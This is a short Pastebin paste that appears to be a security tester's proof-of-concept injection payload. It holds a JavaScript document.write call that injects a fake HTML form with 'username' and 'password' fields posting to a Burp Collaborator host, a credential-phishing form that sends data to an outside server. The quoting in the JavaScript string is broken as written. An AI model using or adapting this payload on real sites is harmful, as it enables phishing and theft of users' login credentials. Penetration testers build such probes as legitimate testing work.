Advertisement
Guest User

Untitled

a guest
Apr 24th, 2018
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.50 KB | None | 0 0
  1. document.write("<!DOCTYPE html>
  2. <html>
  3. <body>
  4.  
  5. <h2>HTML Forms</h2>
  6.  
  7. <form action="https://p1radqg2te94anqikagr0v5a91fs3h.burpcollaborator.net/action_page.php">
  8. First name:<br>
  9. <input type="text" name="username" value="Mickey">
  10. <br>
  11. Last name:<br>
  12. <input type="text" name="password" value="Mouse">
  13. <br><br>
  14. <input type="submit" value="Submit">
  15. </form>
  16.  
  17. <p>If you click the "Submit" button, the form-data will be sent to a page called "/action_page.php".</p>
  18.  
  19. </body>
  20. </html>
  21. ");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement